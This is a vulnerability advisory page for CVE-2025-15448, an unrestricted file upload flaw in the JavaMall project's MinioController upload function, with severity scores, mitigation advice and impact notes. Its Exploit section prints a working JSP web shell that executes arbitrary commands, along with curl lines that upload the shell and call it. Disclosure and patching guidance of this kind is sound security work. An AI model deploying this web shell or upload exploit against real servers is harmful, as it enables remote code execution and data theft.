JavaMall, Unrestricted Upload, CVE-2025-15448 (Medium)

Listen to this Post

A vulnerability, identified as CVE-2025-15448, exists in the JavaMall project by cld378632668 up to commit 994f1e2b019378ec9444cdf3fce2d5b5f72d28f0. The flaw is located in the `Upload` function within the `MinioController.java` file. This function fails to properly validate or restrict the types of files being uploaded, leading to an Unrestricted Upload of File with Dangerous Type (CWE-434) vulnerability . An attacker can exploit this remotely by sending a crafted request to the upload endpoint with a malicious file, such as a web shell or other executable content. Because the application does not verify the file’s content or extension, the malicious file is accepted and stored on the server . This can lead to remote code execution if the uploaded file is subsequently accessed and executed in the server’s context. The project uses a rolling release model, so specific version identifiers are not provided, and the vendor did not respond to disclosure attempts .

DailyCVE Form:

Platform: JavaMall
Version: up to commit 994f1e2
Vulnerability : Unrestricted File Upload
Severity: Medium
date: Jan 4, 2026

Prediction: Not available (vendor unresponsive)

What Undercode Say:

Analytics:

  • CVE ID: CVE-2025-15448
  • CVSS 4.0 Score: 5.3 (Medium) `(CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N)`
    – CVSS 3.1 Score: 6.3 (Medium) `(CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L)`
    – EPSS Score: 0.00034 (as of Jan 5, 2026)
  • CWE: CWE-434 (Unrestricted Upload of File with Dangerous Type)
  • Attack Vector: Network
  • Privileges Required: Low
  • User Interaction: None

Exploit:

Example using curl to upload a malicious JSP file (webshell.jsp)
This assumes the vulnerable endpoint is mapped to /upload or similar.
The exact endpoint path needs to be discovered from the source code.
JSP_PAYLOAD='<%@ page import="java.util.,java.io."%>
<%
if (request.getParameter("cmd") != null) {
Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
OutputStream os = p.getOutputStream();
InputStream in = p.getInputStream();
DataInputStream dis = new DataInputStream(in);
String disr = dis.readLine();
while ( disr != null ) {
out.println(disr);
disr = dis.readLine();
}
}
%>'
echo "$JSP_PAYLOAD" > webshell.jsp
Replace <JAVAMALL_URL> with the target application's base URL
curl -F "[email protected]" http://<JAVAMALL_URL>/path/to/vulnerable/upload
After upload, access the shell
curl http://<JAVAMALL_URL>/path/to/uploads/webshell.jsp?cmd=id

Protection from this CVE:

  • Input Validation: Implement strict allow-list validation on the server-side for file types, extensions, and MIME types.
  • Content Verification: Scan file content to ensure it matches expected file types, not just relying on extension or MIME header.
  • Secure Storage: Store uploaded files outside the web root or in a location not directly accessible via URL. Serve files through a script that enforces access controls.
  • Filename Sanitization: Rename uploaded files to a random, server-generated name to prevent direct access and execution.
  • Disable Execution: Configure the storage directory to prevent the execution of scripts (e.g., using .htaccess for Apache or disabling execute permissions).

Impact:

A successful exploit allows an attacker with low privileges to upload arbitrary files, including web shells or malicious scripts. This can lead to:
– Remote Code Execution (RCE): Executing system commands on the underlying server.
– Data Breach: Accessing, modifying, or deleting sensitive data stored in the database or file system.
– Server Compromise: Using the compromised server as a foothold for further attacks on internal networks.
– Defacement: Altering the application’s content or functionality.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top